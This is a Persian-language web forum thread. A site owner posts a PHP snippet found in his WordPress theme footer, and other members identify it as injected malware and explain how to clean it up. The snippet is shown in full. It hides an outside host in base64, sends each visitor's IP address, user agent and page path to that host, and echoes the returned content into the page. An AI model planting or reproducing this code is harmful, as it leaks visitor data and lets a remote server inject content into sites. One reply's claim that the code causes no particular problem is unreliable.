M.Hajloo

کمک برای شناسایی یک کد در فوتر قالب

6 پست در این موضوع قرار دارد

درود

دوستان 1 کد توی فوتر قالب من وجود داره که نمیدونم کارش چی هست و اصلاً آیا بهش نیاز هست یا خیر

ممنون میشم 1 توضیحی بدید تا متوجه بشم کار این کد چیه :


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}

0

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

3

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

0

به اشتراک گذاری این پست


لینک به پست

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

کد می تونه از یک افزونه هم انتقال پیدا کنه

هر فایلی می تونه مخرب باشه و دستور کپی یک تکه کد را روی یکی از برگه های قالب جاری بعد یا قبل از تگی مثل فوتر بده اگر باز هم همین مورد تکرار شد تگ فوتر را از قالب حذف کنید و تست بگیرید اگر مورد هم دیگه تکرار نشد بگردید دنبال افزونه ای که این کدها رو توش داشته باشه

4

به اشتراک گذاری این پست


لینک به پست

نه به قالب اختصاصی مربوط نمیشه چون این کد برای یک ایرانی نیست و نویسنده این تروجان یک غیر ایرانی هستش

این کد قبلن هم در انجمن یادمه توسط چند تا یوزر دیگه گذارش شده بود که خود به خود اضافه میشه

اونموقع تحقیق که کردم این یک تروجان هست که توی ویندوز وجود داره و اگر شما به وسیله ftp به هاست متصل بشی یا از آپلود سی پنل فایلی آپلود کنی ، به صورت خودکار این کد مخرب رو توی 3 فایل اصلی index.php & header.php & footer.php اضافه میکنه و اگر فایل رو دیکد کنی میبینی که اطلاعات بازدید کننده هارو دریافت میکنه و به یک آمارگیر خارجی میفرسته

مشکل خاصی نداره این کد اما با اینکه برای ربات های گوگل شرط گذاشته اما بازم گوگل میفهمه و سایت شمارو بلاک میکنه به عنوان مخرب

برای حل این مشکل :

سیستمت رو 100% پاکسازی کن و بعد برو به سی پنل و همه فایل های مشکوک رو پاک کن و بعد این کد رو از داخل همه فایل ها که همشونم اول فایل گذاشته شدرو پاک کن

اگر کارهارو درست انجام داده باشی دیگه کدی اضافه نمیشه

5

به اشتراک گذاری این پست


لینک به پست

ممنون از راهنمائی مفیدتون

سیستم را با آخرین آپدیت نود اسکن کردم مشکلی نبود

هاست را هم به وسیله آنتی ویروسش اسکن کردم که خدا را شکر چیزی نبود

چند روز پیش چند تا افزونه مثل پخش آنلاین موزیک و ... تست کردم که فکر کنم از روی همین ها اضافه شده بوده

این کد هم فقط تو فایل فوتر وجود داشت که حذف کردم

*سپاس*

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط dastjerdisf
      با سلام
      در بین اساتید کسی می تونه به من کمک کنه بگه چرا وقتی آدرس سایتم رو می نویسم اتومات این متن رو به اون اضافه می کنه/?i=1
      از مدیریت هاست پرسیدم میگند از کش مرورگر هستش اما چرا سایت های دیگه این جوری نیستند
      آدرس سایتم:http://hushmandyar.ir
    • توسط saeid1872
      سلام دوستان
      تو کمتر از یک ماه سایتم 61 ارور 500 ثبت کرده که در حال زیاد شدن هستش نمیدونم چرا این ارورهارو ثبت میکنه
      لطفا دلیلش رو بگید و اینکه چطور باید رفع کنم
      من خیلی اصلا حرفه ای نیستم فقط خواهشا جوری راهنمایی کنید که بتونم رفعش کنم.

    • توسط devil1367
      با سلام
      من یک فروشگاه دارم چون قالب قبلیم نیازهامو نمیتونست برطرف کنه یه قالب جدید از یکی از سایتها خریداری کردم
      سوالم اینه با نصب بسته اسان نصب اطلاعاتی یا محصولات قبلی که داشتم حذف میشن ؟
      چطوری قالب رو شبیه دمو دربیارم و صفحات و برگه ها import کنم.
       
      با تشکر
    • توسط mahdisabet
      سلام
      دوستان کسی میتونه بگه چه طور میتونم متن فوتر قالب وردپرس رو تغییر بدم؟ توی کدوم قسمت پیشخوان میشه این کار رو کرد؟
    • توسط armakcell
      با سلام بنده در سایتم میخواستم یک ابزارک قرار بدم مانند ابزارک این سایت
      http://powerturk.ir

      اگر داخل این سایت برید در یک قسمت نوشته است آرشیو فول البوم
      بنده این ابزارک را چگونه به دست بیارم؟
      بنده یک تصویر ضمیمه میکنم در صورتی که در سایت وارد نشد